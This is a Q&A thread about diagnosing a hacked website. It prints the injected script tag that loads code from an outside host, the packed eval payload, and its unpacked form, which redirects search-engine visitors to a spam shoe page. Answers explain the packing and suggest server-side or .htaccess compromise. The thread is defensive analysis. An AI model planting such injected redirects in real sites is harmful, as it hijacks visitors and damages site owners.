# How does this JavaScript hack work?

Tags: javascript, redirect

I've encountered a strange hack of a website that doesn't belong to me, and I'm trying to help the web admin out by identifying the source of the issue.  Here's the diagnosis: Google flags the website with a "This website may be hacked" notice.  When following the link from Google, you are redirected to a different, completely unrelated page.  If I cancel the page load before redirection and then view the source html, I see that there is a little JavaScript snippet inserted at the very beginning of the document, which apparently is causing the redirection.  Now here's the strange bit: The malicious JavaScript only appears when navigating to the page from certain search engines like Google or Bing.  If you go to the page directly, nothing is wrong, and even if I go to this page from another search engine like DuckDuckGo, nothing is wrong.

The malicious script itself reads `<script type="text/javascript" src="http://www.enternote.fr/superfly.js"></script>`.  Here is what is at the src link: (with additional tabs and line breaks to make it easier to look at, hopefully)

```
eval(
    function(p,a,c,k,e,r){
        e=function(c){
            return c.toString(a)
        };
        if(!''.replace(/^/,String)){
            while(c--) 
                r[e(c)]=k[c]||e(c);
            k=[function(e){return r[e]}];
            e=function(){return'\\w+'};
            c=1
        };
        while(c--)
            if(k[c]) p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
            return p
    }('4 1=5.6;7(1.2("8")>0||1.2("9")>0||1.2("a")>0||1.2("b")>0){d.e.f=\'g://h.i.j/3-k-3-l-m-n-c-o.p\'}',
    26,
    26,
    '|s|indexOf|nike|var|document|referrer|if|google|bing|yahoo|aol||window|location|href|http|www|soccerxp|com|shoes|mercurial|superfly|fg|1_176|html'.split('|'),
    0,
    {})
)
```

I haven't analyzed this in detail, but from the `document|referrer|if|google|bing|yahoo|aol||window|location|href...` part it seems obvious that this is doing the redirection, and moreover the fact that the redirection only occurs for search traffic is a deliberate act on behalf of the hacker.

However, I'm not sure why the script only appears in the source html if you navigate from a search engine.  I'm no hacking expert, but this smells like injection into a server side code.  The only alternative I can see is if the script somehow manages to delete itself if the referrer is not one of those it cares about.  Is this possible?

So the questions are: Is this a known hack, and if so what is the cure?  Is there necessarily some deeper problem with the server side scripts, or could this be a purely JavaScript hack?

Possibly relevant information: The website is made using Network Solutions' Image Cafe feature.

Answer (score 5, accepted):

`function(p,a,c,k,e,r){` is the signature of one of the script packers used to "encrypt" some code and make it less easily identifiable and readable. But it's stupid and ineffective.

Just change

```
eval( something )
```

with

```
var script = (something);
```

the you'll see what the encrypted code is :

```
var s=document.referrer;
if(s.indexOf("google")>0||s.indexOf("bing")>0||s.indexOf("yahoo")>0||s.indexOf("aol")>0){
    window.location.href='http://www.soccerxp.com/nike-shoes-nike-mercurial-superfly-fg-c-1_176.html'
}
```

So it's just a script changing the location to `http://www.soccerxp....` when the user comes from a search engine (as given by `referrer`).

The real problem the site owner has is that its site could be changed by the attacker. The server's security is compromised and must be fixed.

Comment: Very nice.  The other question, though, is why the script is sometimes present and sometimes not.  There must be some malicious server side code to make this happen, correct?

Comment: Without knowing the page I can't answer that. But the site owner should retake control of his server to prevent those injections (and not make it happen again, for example with installing any WP plugins or any nice looking software).

Answer (score 0):

One possibility is that the .htaccess file has also been hacked,
such that it makes a similar check for REFERRER and only supplies the JS code accordingly.

Hosting company inmotionhosting has this advice about the situation:

http://www.inmotionhosting.com/support/website/hacks/cleaning-up-a-htaccess-hack

Which starts off by saying

> In this article we'll discuss steps you can take to clean up a .htaccess hack. The .htaccess file is used to primarily setup rewrite rules to control the way your site is accessed.

(I have no affiliation with them - I just came across that article in the same search that landed me no this question.)

It might also be that some Server Side Include code (which you never see on the client side) has been altered.  The site owner should login to the site and examine all his files directly, rather than via a browser.